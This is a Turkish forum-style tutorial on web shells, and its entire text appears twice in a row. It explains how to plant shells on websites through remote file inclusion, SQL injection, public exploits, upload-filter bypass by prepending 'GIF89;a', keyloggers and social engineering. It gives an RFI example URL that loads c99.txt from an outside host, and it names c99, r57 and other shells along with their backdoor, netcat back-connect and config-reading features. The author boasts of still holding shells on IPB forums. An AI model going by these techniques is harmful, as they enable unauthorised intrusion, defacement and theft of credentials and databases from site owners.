Sorular. Maddeler. Başlıklar.
1) shell nedir?
2) shell Nasıl Atılır?
3) kaç Tür shell Vardır?
Cevaplar.
1) shell nedir?
shell Yüklendiği Sitede Size Çeşitli Yetkiler Veren Bir Materyaldir. Bu Yetkiler; Okuma, Yazma ve Silme Yetkileridir. shell Attığınız Sitede Bazen Bir Site Sahibinin Yetkilerini Kullanabilirken, Bazende Host Sahibinin Yetkilerini Kullana Biliyorsunuz. Bu Olaya Permission Yetkisi Diyebiliriz.
Permissionları Açık Olan Bir Sunucuda İstediğiniz Bütün Dosya ve Klasöri Okuyabilir, Silebilir veya Yükleme Yapabilirsiniz. Permissionları Kapalı Bir Sunucuda İse Bu Yetkiler Sınırlıdır. Tam Yetkiye Ulaşabilmeniz İçin Serveri Rootlamanız Gerekmektedir.
Bir shelli En İyi Shelikde Kullanabilmek İçin shell Komutlarını İyi Bilmek Gerekir. Bunun Sebebi İse Sınırlı Yetkiniz Olan Sunucularda Tam Yetkiye Sahip Olmanız İçindir.
Bir Çok Sunucuda Manuel Geçişlere İzin Verilmektedir. Spoll/Mail Kısmından Sunududaki Diğer Sitelerin Kullanıcı Adını Öğrenerek Adres Çucuğundan Manuel Geçişlerde Yapabilirsiniz.
Bazı Durumlarda İse shell Yüklediğimiz Sitede Ya Permissionlar Sınırlı Yetkilere Sahiptir, Yada Yine Sadece Yüklediğimiz Sitede Sınırsız Yetkiye Sahip Olabiliyoruz. Burada Sınırsız Yetkimiz Var İse ve Sadece İndex Atıp Çıkmak İstiyorsak İndex.html Dosyamızı Upload Eder Çıkarız. Eyerki Yetkilerimiz Sınırlandırılmış İse Sitedeki Config Dosyalarını Okuyarak SQL İle Bağlantı Sağlaya Biliriz.
shelli Ne İçin ve Hangi Aşamalarda Kullandığımızı Hacker Diliyle Anlattım Bir Diğer Maddeye Geçelim. Bu Maddemizde Anlamadığın veya Yeniden Anlatılmasını İstediğiniz Bir Yer Olursa Konu Aldında Belirtiniz.
2) shell Nasıl Atılır?
Aşamaları:
* Remote File Iclusion Açıklarından Faydalanabiliriz
* SQL Injection Açıklarından Faydalanabiliriz
* Exploits Kullanarak Yükleme Yapabiliriz
* Upload Açıklarından Faydalanabiliriz
* Logger vb Spy Yazılımlardan Faydalanabiliriz
* Hedef Sunucudan Hesap Açarak Yükleme Yapabiliriz
* Sosyal Mühendislik Kullanarak Yükleme Yapabiliriz
1) Remote File Inclusion Açıklarını Kullanarak .Txt Uzantılı shellimizden Yukarıda Bahsetiğim Yetkiler Çerçevesinde (Permissionlar) İstediğimiz Gibi .Php Uzantılı shell Yükleyebiliriz. veya Bağlandığımız .Txt shell ile Yine Sunucu Yetkileri Çerçevesinde Alt Dizinlere Geçebiliriz yada İndeximizi Upload Eder Çıkarız.
Örnek:
http://www.siteadi.com/İndex.php?denetim=http://r57.info/c99.txt?
İle Bağlandığımız Siteye .php Uzantılı shelli Upload Edersek Kullanımı Şu Şekilde Olur.
http://www.siteadi.com/c99.php
Şeklinde Kullanıma Geçebiliriz.
RFI Konusunu Artık Bilmeyen Yok Şuanda RFI Bitmesede Çok Nadir Rastlanan Açıklar Haline Deldi. Bu Yüzden Bütün Hakcing Bilgilerinizi RFI Açığına Bağlamayın.
2) SQL Injection Açığıyla Nasıl shell Atacaz. Öncelikle SQL Açığını Kullanmasını Bilen Mantığı Hemen Anlar, nedir Bu Mantık? SQL Kodları Yardımıyla Site Sahibinin Kullanıcı Adı ve Şifresini Elde Ediyoruz. Kimi Zaman MD5 Seklinde Şifre Gelir, Bizde MD5 Cracker Yardımıyla Kırarız.
Elde Ettiğimiz Kullanıcı Adı ve Şifre İle Siteye Giriş Yaparız Admin Panelden Bir Upload Yeri Bulur shell Dosyamızı (.php veya .asp) Upload Ederiz ve Yine Sunucuya Bağlanmış Oluruz.
SQL Şuanda Kullanılan Yaygın Hacking Yöntemlerinden Biridir. Çok Büyük Sitelerde Bile Rastlanan Hiç Değilse Her Serverde En Az 1 den Fazla Sitede Rastlanan Açıktır.
3) Exploits Kullanarak shell Atabiliriz Buda Yine Derlenmiş Exploitler Sayesinde Sitenin Admin Bilgilerini (kullanıcı adı ve şifresini) Elde Ederek Admin Panelden shell Upload Edebiliriz ve Yine Sunucuda Yetkilerimiz Dahilinde İşlem Yapabiliriz.
Buna Şöyle Bir Örnek Vereyim, Bir Dönem IPB Forumlarında Exploits Sayesinde Admin Şifrelerine Ulaşabiliyorduk. Hala Çoğu IPB Forumlarında shellerim Bulunmakta.
4) Upload Açıklarından Faydalanarak Sitelere shell Yükleyebiliriz. Burada Genellikle .php veya .asp Uzantılı shellerimizi Kabul Etmeyen Upload Siteleriyle Karşılaşıyoruz. Bunun İçin shell İçine GIF89;a Yazısını Ekleyerek Upload Sayfasının Yükleyeceğimiz shelli Resim Dosyası Olarak Görmesini Sağlarız.
Aklınızın Almayacağı Kadar Çok Upload Dosyaları Vardır. Bunlardan En Çok Kullanılan Bir İki Tanesini Yazayım.
upload.php , upload.asp , upload.htm , upload.html
Bu Uzantıları ve Upload Sayfalarını Hayal Gücünüze Bağlı Çoğalta Bilirsiniz.
5) Hiç Tavsiye Etmediğim ve Hiç Kullanmadığım Ancak Buda Bir Hacking Yöntemi Olduğu İçin Açıklamak Zorunda Kaldığım Bir Yöntem. Logger vb Spy Yazılımlar Sayesinde shell Nasıl Atılır? Öncelikle Hedef Sitemizin Adminini Buluyoruz Gerekli SM vb İşlemleri Gerçekleştirdikten Sonra Loggeri Yedirip Admin Şifreleride Dahil Olmak Üzere FTP ve Mail Şifrelerini Alırız. Aldığımız Şifreler Sayesinde Site Sahibinin Yetkilerini Almamıza Rağmen FTP Sine Girdiğimiz Sitenin Sunusunada Ulaşmak İstiyorsan shell Upload Eder ve Yetkilerimiz Çerçevesinde İzinlerimizi Kullanarak Siteyi veya Serveri Hackleye Biliriz.
6) Bu Maddemizde İse Diyelimki Hedef bir Site var. Sitede Her Şeyi Yapmamıza Rağmen Bir Türlü Açık Bulamadık. Genelde Son Çare Olarak Kullanılan Bu Yöntemle Hostcuyla İrtibata Geçer SM Yaparak Sunucudan Bir Hesap Açarız Açtığımız Hesapta Göz Boyamak Adına Ufak Tefek Portallar Kurar ve FTP mize shell Atarak Serveri Rootlar Hedef Siteye Ulaşırız veya Manuel Geçiler Yaparakda Hedef Siteye Ulaşabiliriz.
7) Sosyal Mühendislik Yöntemiyle Siteye shell Yükleye Biliriz. Burada İşin İçine SM Girdiği İçin Belirli Bir Yöntem Yoktur. Ancak SM Yapan Kişinin Kabiliyetine Bağlıdır. Bir Kişi Sosyal Mühendislik Yapabilecek Kabiliyetteyse Çok Kolay ve Rahat Bir Şekilde Çeşitli Yollarla Siteye veya FTP ye Ulaşarak shell Atabilir.
shell Nasıl Atılır Maddemizde Burada Bitmiştir. Yukarıda Belirttiğim 7 Madde Çoğaltılabilir. Bu Konuda da Anlamadığınız veya Daha Detaylı Anlatmamı İstediğiniz Yerleri Konu Altına Belirtirseniz Farklı veya Daha Geniş Anlatımlar Yapabilirim.
3) Kaç Tür shell Vardır?
Genel Olarak Kullanılan 2, 3 Çeşit shell Vardır. Bunarın Uzantıları .php, .asp ve .aspx Dir. Şuanda Zannediyorum 100 lerce shell Var Ancak Hemen Hemen Hepsinin Çalışma Mantığı Aynı.
Ençok Kullanılan sheller:
C99.php (Yeni Başlayanlar İçin Kullanımı Kolay Bir shell)
R57.php ( shell Olayını Artık Çözmüş Kod Bilgisine Döken Kişiler Kullanıyor)
CyberSpy5.asp ( Genelde Kullandığım sheller Arasındadır.)
LORD.aspx ( Zaman Zaman Kullandığım Bir shelldir.)
c99 veya r57 .txt sheller ( Bunlar RFI İçin Kullanılan shellerdir)
NOT: RFI de .asp shell veya .php shell Kullanılmaz.
Şimdi Şöyle Bir Bakalım.
.php Uzantılı sheller Unix, Linux, FreeBSD Sunucularında Kullanılır.
.asp Uzantılı sheller İse Windows Sunucularda Kullanılır.
Şimdi Siz Bir Linux Servere .asp Uzantılı shell Atamazsınız Atsanız Dahi Çalıştıramazsınız.
Ancak Windows Serverlere Nadirende Olsa Rastlamışımdır. .php Uzantılı sheller Atılabiliryor. Ancak .asp shell Kadar Yetki Vermiyor. Genelde Editleme Yetkisine Rastladım. Yükleme ve Silme Yetkileri Bulunmamakta.
Bu Yüzden shell Yükleyeceğiniz Sitenin Sistemi İyi Bilmeniz Gerekiyor.
Bilmeyenler İçin c99 Shell Nedir Neçidir Ne İşe Yarar ?
c99 shell diğer sheller gibi yüklendiğiz sitede size çeşitli yetkiler veren zararlı php scripttir. bu scriptle linux ve windows sunuculara arka kapıdan(backdoor) bir takım işlemler yapılabilir. Serverde bırakmak, server güvenliği için tehlikelidir. c99 shell bütün antivirüslerce zararlı yazılım olarak kabul edilmekte ve antivirüslerce silinmektedir lakin kodları şifrelendiğinde yakalanmaya bilir. Bu scriptte serverdeki izinler yetkiler (permission) beyaz renkli olanlar yazma yetkisi olmayanlar, yeşil renkli olanlar ise yazılabilir tam yetki izinlerini göstermektedir.izinlerini göstermektedir.
Gözat Upload ise yeşil renkliyse dosya upload edilebilir, dosya uploadına izin var demektir Kırmızı renkteyse dosya upload izni yok demektir. Bu scriptle klasör oluşturabilir, dizinler arası geçiş varsa izinler müsaitse bütün dizinler kontrol edilebilir. Değiştir bölümünden yeşil renkli yazma izinli dosyalar değiştirilebilir. Gene bu scritle back connect arka kapıdan netcat nc.exe vasıtasıyla bağlanılabilir. Serverde izin verilen bütün komutlar çalıştırılabilir, root exploitleri denenebilir, Kriptolu veya kriptosuz şifreler okunabilir. Diğer bir özelliğide SQL bölümünden config.php configuration.php, wp-config.php gibi dosyalar okunarak sql bağlantı bilgileri alınarak sql ye erişilebilir, sql ile ilgili bütün işlemler yapılabilir. Sonuç itibariyle, serverde bu tür zararlı scriptlere karşı önlem alınmadıysa son derece tehlikelidir.
Bilmeyenler İçin r57 Shell Nedir Neçidir Ne İşe Yarar ?
r57 shell de tıpkı c99 shell gibi tehlikeli ve zararlı php scripttir. Antivirüslerin tamamı tarafından, tehlikeli bulunmuştur.Genellikle profesyonel kişiler tarafından tercih edilir. c99 shell scriptle yapılabilinen her şey ve daha fazlası bu scritplede yapılmaktadır. c99 sql ye bağlanma yönünden daha etkili, detaylarına ulaşmak bakımından daha yetenekliyken, r57 shell komut satırlarını kullanma, safe mode on of durumlarında daha etkili ve tehlikelidir.
r57 shell scripte karşıda gerekli güvenlik önlemleri alınmalıdır. Server sık sık taratılarak bu gibi zararlı içerikli scriptler serverden temizlenmeli, ayrıca bu scriptlerin çalışmaması için gerekli güvenlik önlemleri alınmalıdır.
Kaynak: r57, c99, r57 shell, c99 shell, r57.txt, c99.txt, r57.info
1) shell nedir?
2) shell Nasıl Atılır?
3) kaç Tür shell Vardır?
Cevaplar.
1) shell nedir?
shell Yüklendiği Sitede Size Çeşitli Yetkiler Veren Bir Materyaldir. Bu Yetkiler; Okuma, Yazma ve Silme Yetkileridir. shell Attığınız Sitede Bazen Bir Site Sahibinin Yetkilerini Kullanabilirken, Bazende Host Sahibinin Yetkilerini Kullana Biliyorsunuz. Bu Olaya Permission Yetkisi Diyebiliriz.
Permissionları Açık Olan Bir Sunucuda İstediğiniz Bütün Dosya ve Klasöri Okuyabilir, Silebilir veya Yükleme Yapabilirsiniz. Permissionları Kapalı Bir Sunucuda İse Bu Yetkiler Sınırlıdır. Tam Yetkiye Ulaşabilmeniz İçin Serveri Rootlamanız Gerekmektedir.
Bir shelli En İyi Shelikde Kullanabilmek İçin shell Komutlarını İyi Bilmek Gerekir. Bunun Sebebi İse Sınırlı Yetkiniz Olan Sunucularda Tam Yetkiye Sahip Olmanız İçindir.
Bir Çok Sunucuda Manuel Geçişlere İzin Verilmektedir. Spoll/Mail Kısmından Sunududaki Diğer Sitelerin Kullanıcı Adını Öğrenerek Adres Çucuğundan Manuel Geçişlerde Yapabilirsiniz.
Bazı Durumlarda İse shell Yüklediğimiz Sitede Ya Permissionlar Sınırlı Yetkilere Sahiptir, Yada Yine Sadece Yüklediğimiz Sitede Sınırsız Yetkiye Sahip Olabiliyoruz. Burada Sınırsız Yetkimiz Var İse ve Sadece İndex Atıp Çıkmak İstiyorsak İndex.html Dosyamızı Upload Eder Çıkarız. Eyerki Yetkilerimiz Sınırlandırılmış İse Sitedeki Config Dosyalarını Okuyarak SQL İle Bağlantı Sağlaya Biliriz.
shelli Ne İçin ve Hangi Aşamalarda Kullandığımızı Hacker Diliyle Anlattım Bir Diğer Maddeye Geçelim. Bu Maddemizde Anlamadığın veya Yeniden Anlatılmasını İstediğiniz Bir Yer Olursa Konu Aldında Belirtiniz.
2) shell Nasıl Atılır?
Aşamaları:
* Remote File Iclusion Açıklarından Faydalanabiliriz
* SQL Injection Açıklarından Faydalanabiliriz
* Exploits Kullanarak Yükleme Yapabiliriz
* Upload Açıklarından Faydalanabiliriz
* Logger vb Spy Yazılımlardan Faydalanabiliriz
* Hedef Sunucudan Hesap Açarak Yükleme Yapabiliriz
* Sosyal Mühendislik Kullanarak Yükleme Yapabiliriz
1) Remote File Inclusion Açıklarını Kullanarak .Txt Uzantılı shellimizden Yukarıda Bahsetiğim Yetkiler Çerçevesinde (Permissionlar) İstediğimiz Gibi .Php Uzantılı shell Yükleyebiliriz. veya Bağlandığımız .Txt shell ile Yine Sunucu Yetkileri Çerçevesinde Alt Dizinlere Geçebiliriz yada İndeximizi Upload Eder Çıkarız.
Örnek:
http://www.siteadi.com/İndex.php?denetim=http://r57.info/c99.txt?
İle Bağlandığımız Siteye .php Uzantılı shelli Upload Edersek Kullanımı Şu Şekilde Olur.
http://www.siteadi.com/c99.php
Şeklinde Kullanıma Geçebiliriz.
RFI Konusunu Artık Bilmeyen Yok Şuanda RFI Bitmesede Çok Nadir Rastlanan Açıklar Haline Deldi. Bu Yüzden Bütün Hakcing Bilgilerinizi RFI Açığına Bağlamayın.
2) SQL Injection Açığıyla Nasıl shell Atacaz. Öncelikle SQL Açığını Kullanmasını Bilen Mantığı Hemen Anlar, nedir Bu Mantık? SQL Kodları Yardımıyla Site Sahibinin Kullanıcı Adı ve Şifresini Elde Ediyoruz. Kimi Zaman MD5 Seklinde Şifre Gelir, Bizde MD5 Cracker Yardımıyla Kırarız.
Elde Ettiğimiz Kullanıcı Adı ve Şifre İle Siteye Giriş Yaparız Admin Panelden Bir Upload Yeri Bulur shell Dosyamızı (.php veya .asp) Upload Ederiz ve Yine Sunucuya Bağlanmış Oluruz.
SQL Şuanda Kullanılan Yaygın Hacking Yöntemlerinden Biridir. Çok Büyük Sitelerde Bile Rastlanan Hiç Değilse Her Serverde En Az 1 den Fazla Sitede Rastlanan Açıktır.
3) Exploits Kullanarak shell Atabiliriz Buda Yine Derlenmiş Exploitler Sayesinde Sitenin Admin Bilgilerini (kullanıcı adı ve şifresini) Elde Ederek Admin Panelden shell Upload Edebiliriz ve Yine Sunucuda Yetkilerimiz Dahilinde İşlem Yapabiliriz.
Buna Şöyle Bir Örnek Vereyim, Bir Dönem IPB Forumlarında Exploits Sayesinde Admin Şifrelerine Ulaşabiliyorduk. Hala Çoğu IPB Forumlarında shellerim Bulunmakta.
4) Upload Açıklarından Faydalanarak Sitelere shell Yükleyebiliriz. Burada Genellikle .php veya .asp Uzantılı shellerimizi Kabul Etmeyen Upload Siteleriyle Karşılaşıyoruz. Bunun İçin shell İçine GIF89;a Yazısını Ekleyerek Upload Sayfasının Yükleyeceğimiz shelli Resim Dosyası Olarak Görmesini Sağlarız.
Aklınızın Almayacağı Kadar Çok Upload Dosyaları Vardır. Bunlardan En Çok Kullanılan Bir İki Tanesini Yazayım.
upload.php , upload.asp , upload.htm , upload.html
Bu Uzantıları ve Upload Sayfalarını Hayal Gücünüze Bağlı Çoğalta Bilirsiniz.
5) Hiç Tavsiye Etmediğim ve Hiç Kullanmadığım Ancak Buda Bir Hacking Yöntemi Olduğu İçin Açıklamak Zorunda Kaldığım Bir Yöntem. Logger vb Spy Yazılımlar Sayesinde shell Nasıl Atılır? Öncelikle Hedef Sitemizin Adminini Buluyoruz Gerekli SM vb İşlemleri Gerçekleştirdikten Sonra Loggeri Yedirip Admin Şifreleride Dahil Olmak Üzere FTP ve Mail Şifrelerini Alırız. Aldığımız Şifreler Sayesinde Site Sahibinin Yetkilerini Almamıza Rağmen FTP Sine Girdiğimiz Sitenin Sunusunada Ulaşmak İstiyorsan shell Upload Eder ve Yetkilerimiz Çerçevesinde İzinlerimizi Kullanarak Siteyi veya Serveri Hackleye Biliriz.
6) Bu Maddemizde İse Diyelimki Hedef bir Site var. Sitede Her Şeyi Yapmamıza Rağmen Bir Türlü Açık Bulamadık. Genelde Son Çare Olarak Kullanılan Bu Yöntemle Hostcuyla İrtibata Geçer SM Yaparak Sunucudan Bir Hesap Açarız Açtığımız Hesapta Göz Boyamak Adına Ufak Tefek Portallar Kurar ve FTP mize shell Atarak Serveri Rootlar Hedef Siteye Ulaşırız veya Manuel Geçiler Yaparakda Hedef Siteye Ulaşabiliriz.
7) Sosyal Mühendislik Yöntemiyle Siteye shell Yükleye Biliriz. Burada İşin İçine SM Girdiği İçin Belirli Bir Yöntem Yoktur. Ancak SM Yapan Kişinin Kabiliyetine Bağlıdır. Bir Kişi Sosyal Mühendislik Yapabilecek Kabiliyetteyse Çok Kolay ve Rahat Bir Şekilde Çeşitli Yollarla Siteye veya FTP ye Ulaşarak shell Atabilir.
shell Nasıl Atılır Maddemizde Burada Bitmiştir. Yukarıda Belirttiğim 7 Madde Çoğaltılabilir. Bu Konuda da Anlamadığınız veya Daha Detaylı Anlatmamı İstediğiniz Yerleri Konu Altına Belirtirseniz Farklı veya Daha Geniş Anlatımlar Yapabilirim.
3) Kaç Tür shell Vardır?
Genel Olarak Kullanılan 2, 3 Çeşit shell Vardır. Bunarın Uzantıları .php, .asp ve .aspx Dir. Şuanda Zannediyorum 100 lerce shell Var Ancak Hemen Hemen Hepsinin Çalışma Mantığı Aynı.
Ençok Kullanılan sheller:
C99.php (Yeni Başlayanlar İçin Kullanımı Kolay Bir shell)
R57.php ( shell Olayını Artık Çözmüş Kod Bilgisine Döken Kişiler Kullanıyor)
CyberSpy5.asp ( Genelde Kullandığım sheller Arasındadır.)
LORD.aspx ( Zaman Zaman Kullandığım Bir shelldir.)
c99 veya r57 .txt sheller ( Bunlar RFI İçin Kullanılan shellerdir)
NOT: RFI de .asp shell veya .php shell Kullanılmaz.
Şimdi Şöyle Bir Bakalım.
.php Uzantılı sheller Unix, Linux, FreeBSD Sunucularında Kullanılır.
.asp Uzantılı sheller İse Windows Sunucularda Kullanılır.
Şimdi Siz Bir Linux Servere .asp Uzantılı shell Atamazsınız Atsanız Dahi Çalıştıramazsınız.
Ancak Windows Serverlere Nadirende Olsa Rastlamışımdır. .php Uzantılı sheller Atılabiliryor. Ancak .asp shell Kadar Yetki Vermiyor. Genelde Editleme Yetkisine Rastladım. Yükleme ve Silme Yetkileri Bulunmamakta.
Bu Yüzden shell Yükleyeceğiniz Sitenin Sistemi İyi Bilmeniz Gerekiyor.
Bilmeyenler İçin c99 Shell Nedir Neçidir Ne İşe Yarar ?
c99 shell diğer sheller gibi yüklendiğiz sitede size çeşitli yetkiler veren zararlı php scripttir. bu scriptle linux ve windows sunuculara arka kapıdan(backdoor) bir takım işlemler yapılabilir. Serverde bırakmak, server güvenliği için tehlikelidir. c99 shell bütün antivirüslerce zararlı yazılım olarak kabul edilmekte ve antivirüslerce silinmektedir lakin kodları şifrelendiğinde yakalanmaya bilir. Bu scriptte serverdeki izinler yetkiler (permission) beyaz renkli olanlar yazma yetkisi olmayanlar, yeşil renkli olanlar ise yazılabilir tam yetki izinlerini göstermektedir.izinlerini göstermektedir.
Gözat Upload ise yeşil renkliyse dosya upload edilebilir, dosya uploadına izin var demektir Kırmızı renkteyse dosya upload izni yok demektir. Bu scriptle klasör oluşturabilir, dizinler arası geçiş varsa izinler müsaitse bütün dizinler kontrol edilebilir. Değiştir bölümünden yeşil renkli yazma izinli dosyalar değiştirilebilir. Gene bu scritle back connect arka kapıdan netcat nc.exe vasıtasıyla bağlanılabilir. Serverde izin verilen bütün komutlar çalıştırılabilir, root exploitleri denenebilir, Kriptolu veya kriptosuz şifreler okunabilir. Diğer bir özelliğide SQL bölümünden config.php configuration.php, wp-config.php gibi dosyalar okunarak sql bağlantı bilgileri alınarak sql ye erişilebilir, sql ile ilgili bütün işlemler yapılabilir. Sonuç itibariyle, serverde bu tür zararlı scriptlere karşı önlem alınmadıysa son derece tehlikelidir.
Bilmeyenler İçin r57 Shell Nedir Neçidir Ne İşe Yarar ?
r57 shell de tıpkı c99 shell gibi tehlikeli ve zararlı php scripttir. Antivirüslerin tamamı tarafından, tehlikeli bulunmuştur.Genellikle profesyonel kişiler tarafından tercih edilir. c99 shell scriptle yapılabilinen her şey ve daha fazlası bu scritplede yapılmaktadır. c99 sql ye bağlanma yönünden daha etkili, detaylarına ulaşmak bakımından daha yetenekliyken, r57 shell komut satırlarını kullanma, safe mode on of durumlarında daha etkili ve tehlikelidir.
r57 shell scripte karşıda gerekli güvenlik önlemleri alınmalıdır. Server sık sık taratılarak bu gibi zararlı içerikli scriptler serverden temizlenmeli, ayrıca bu scriptlerin çalışmaması için gerekli güvenlik önlemleri alınmalıdır.
Kaynak: r57, c99, r57 shell, c99 shell, r57.txt, c99.txt, r57.info